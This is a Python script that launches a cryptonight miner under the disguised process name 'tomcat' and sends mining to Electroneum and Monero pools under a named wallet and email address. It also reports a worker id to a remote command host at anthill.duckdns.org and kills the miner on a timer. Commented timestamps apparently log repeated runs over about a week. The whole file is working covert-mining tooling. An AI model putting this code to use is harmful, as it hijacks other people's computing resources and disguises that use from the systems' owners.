import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:42:01.783577
#2018-02-17 17:31:01.634906
#2018-02-17 19:19:05.062289
#2018-02-17 21:08:05.455527
#2018-02-17 22:52:05.356493
#2018-02-18 00:36:07.022555
#2018-02-18 02:26:02.243195
#2018-02-18 04:13:04.330079
#2018-02-18 06:03:02.135256
#2018-02-18 07:52:03.888573
#2018-02-18 09:41:06.173154
#2018-02-18 11:28:05.948171
#2018-02-18 13:15:04.122152
#2018-02-18 15:03:03.451932
#2018-02-18 16:51:01.629609
#2018-02-18 18:39:05.395975
#2018-02-18 20:27:07.557236
#2018-02-18 22:13:05.354914
#2018-02-19 00:02:04.279025
#2018-02-19 01:47:06.226062
#2018-02-19 03:36:05.558708
#2018-02-19 05:21:04.021140
#2018-02-19 07:09:05.415778
#2018-02-19 08:58:07.841123
#2018-02-19 10:47:06.447376
#2018-02-19 12:35:02.227441
#2018-02-19 14:22:06.043963
#2018-02-19 16:11:07.893532
#2018-02-19 17:58:07.502506
#2018-02-19 19:44:05.321552
#2018-02-19 21:31:07.749966
#2018-02-19 23:16:05.072596
#2018-02-20 01:01:08.125233
#2018-02-20 02:50:08.112162
#2018-02-20 04:39:06.825508
#2018-02-20 06:23:06.334038
#2018-02-20 08:08:02.216861
#2018-02-20 09:53:07.066373
#2018-02-20 11:37:08.419731
#2018-02-20 13:24:09.990150
#2018-02-20 15:10:01.263965
#2018-02-20 16:54:05.604294
#2018-02-20 18:42:04.057831
#2018-02-20 20:32:05.727247
#2018-02-20 22:16:04.502341
#2018-02-20 23:57:01.715841
#2018-02-21 01:41:05.869270
#2018-02-21 03:29:07.993060
#2018-02-21 05:17:06.388313
#2018-02-21 07:05:07.171956
#2018-02-21 08:50:10.653537
#2018-02-21 10:38:08.734814
#2018-02-21 12:27:08.364560
#2018-02-21 14:15:04.659721
#2018-02-21 16:02:07.935029
#2018-02-21 17:53:05.794209
#2018-02-21 19:38:01.325106
#2018-02-21 21:25:07.905100
#2018-02-21 23:12:04.334650
#2018-02-22 01:03:07.863650
#2018-02-22 02:52:03.708155
#2018-02-22 04:39:03.394143
#2018-02-22 06:23:06.822118
#2018-02-22 08:11:06.062497
#2018-02-22 09:59:05.588938
#2018-02-22 11:45:03.280196
#2018-02-22 13:32:05.546673
#2018-02-22 15:21:01.232179
#2018-02-22 17:07:10.917076
#2018-02-22 18:55:01.660699
#2018-02-22 20:46:10.441178
#2018-02-22 22:31:05.151595
#2018-02-23 00:18:02.215277
#2018-02-23 02:07:08.170527
#2018-02-23 03:55:04.951991
#2018-02-23 05:37:07.006627
#2018-02-23 07:22:04.267247
#2018-02-23 09:26:07.063805
#2018-02-23 11:31:09.358873
#2018-02-23 13:22:05.113721
#2018-02-23 15:07:04.698263
#2018-02-23 16:56:02.159025
#2018-02-23 18:45:08.747193
#2018-02-23 20:32:08.230047
#2018-02-23 22:20:09.488353
#2018-02-24 00:05:06.467794
#2018-02-24 01:57:07.605648
#2018-02-24 03:48:07.002176
#2018-02-24 05:37:07.311367
#2018-02-24 07:24:05.299218
#2018-02-24 09:14:06.748583
#2018-02-24 11:07:06.605496
#2018-02-24 12:55:09.101705
#2018-02-24 14:45:03.649767
#2018-02-24 16:37:07.676545
#2018-02-24 18:26:07.678351
#2018-02-24 20:13:05.287821
#2018-02-24 21:59:06.031843
#2018-02-25 02:36:01.366792
#2018-02-25 06:17:07.112697
#2018-02-25 11:40:01.940094